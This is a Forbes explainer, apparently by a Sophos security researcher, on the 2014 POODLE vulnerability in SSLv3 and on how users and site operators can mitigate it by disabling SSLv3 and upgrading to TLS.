Please help us continue to provide you with free, quality journalism by turning off your ad blocker on our site.

Thank you for signing in.

If this is your first time registering, please check your inbox for more information about the benefits of your Forbes account and what you can do next!

I agree to receive occasional updates and announcements about Forbes products and services. You may opt out at any time.

I'd like to receive the Forbes Daily Dozen newsletter to get the top 12 headlines every morning.

Forbes takes privacy seriously and is committed to transparency. We will never share your email address with third parties without your permission. By signing in, you are indicating that you accept our Terms of Service and Privacy Statement.

Tweet This

When you access high profile sites and services such as your bank,
Twitter or
Google you typically access sites using https:// or a feature called SSL (secure sockets layer) but a new security defect could break that open. SSL or TLS (Transport Layer Security) provides encryption to protect your information from being intercepted, spied upon or modified by attackers in between you and the service provider. This widely used technology is what prevents someone sat next you in
Starbucks from watching your transactions as you access your Internet banking and is also frequently used when accessing your e-mail account to stop your username and password disappearing in to the hands of cyber criminals. Simply put SSL is a core component of security, privacy and trust on the Internet . Great though all that sounds unfortunately many sites still fail to adhere to best practice and many don't implement these security features at all leaving information open to interception. Even those which do try to do the right thing can have significant setbacks due to implementation failures or security vulnerabilities. That is precisely what has happened with the new, cutely named, but very nasty POODLE vulnerability.

SSL has a number of different versions and which you support is important from a security standpoint. Backwards compatibility with older versions can get you in real trouble and you can see a wonderfully detailed breakout of the features of each version and timelines here. The POODLE vulnerability impacts SSL version 3 and under the right conditions would allow an attacker to gain access to information that would let them take over your account . For example, the flaw may enable an attacker to gain access to session tokens or credentials so they can hijack the identify of another user. The vulnerability, discovered by Google security researchers Thai Duong, Bodo Moller and Krzysztof Kotowiczis is fully outlined in this paper and makes interesting reading. Geeky bit: the attack is essentially an oracle padding attack in CBC (cipher block chaining which uses output of previous blocks as input to the next block processing to prevent duplicate blocks of data producing identical cipher text blocks) mode ciphers in SSLv3.

Some browsers allow you to do this where others like Safari can pose quite a challenge . A more complete fix is on the way (for those that want to read more check out TLS_FALLBACK_SCSV) but for the moment disabling it is a good move. If you want to check if your browser is vulnerable you can try https://www.poodletest.com which shows you a trendy looking poodle if you are open to the attack. Using a VPN client to protect all your network traffic on open networks will also prevent attackers launching the attack (as long as it is not an SSL VPN that uses SSLv3).

If you are a business and host services there are steps you can take to prevent your users being attacked too. Users accessing your services from open wireless networks are the most at risk . To mitigate this risk you can simply disable SSLv3 in favour of more recent standards such as TLS1, 1.1 or 1.2. Unfortunately some platforms and operating systems do not support the more recent standards. Older versions of Internet Explorer (such as the one in the older, no longer supported but still regrettably widely used Windows XP) only support SSLv3 as is the case for numerous other apps and pieces of software. If you are in the position of using software that only supports these standards you should undoubtedly look at upgrading, not just because of this vulnerability but because that software most likely has other serious defects too. If you run a web server and want to make sure you have your transport security ducks in a row you can check out this guide or you can check how your site scores using this neat tool.

This defect certainly is not another Heartbleed (as undoubtedly it will shortly be dubbed) but it is a failure in widely used technology that is a key component of your security.

I am the Global Head of Security Research for Sophos, one of the worlds largest security companies, trying to defend against malicious code. I’m also a Certified…

I am the Global Head of Security Research for Sophos, one of the worlds largest security companies, trying to defend against malicious code. I’m also a Certified Instructor and Director, EMEA for the SANS institute where I teach a variety of subjects including incident handling and ethical hacking. For the past 10 years I’ve researched malware, hacking and cryptography. I’ve worked with many of the worlds largest and most paranoid organizations to help define security strategy. I often appear on TV ranting about security, have delivered a TED talk and am a frequent speaker at conferences worldwide. These days I am also very keen on developing the next generation of security talent. I've done some work I'm really proud of and some stupid things. I will share my experiences and save others the trouble. Geek at heart.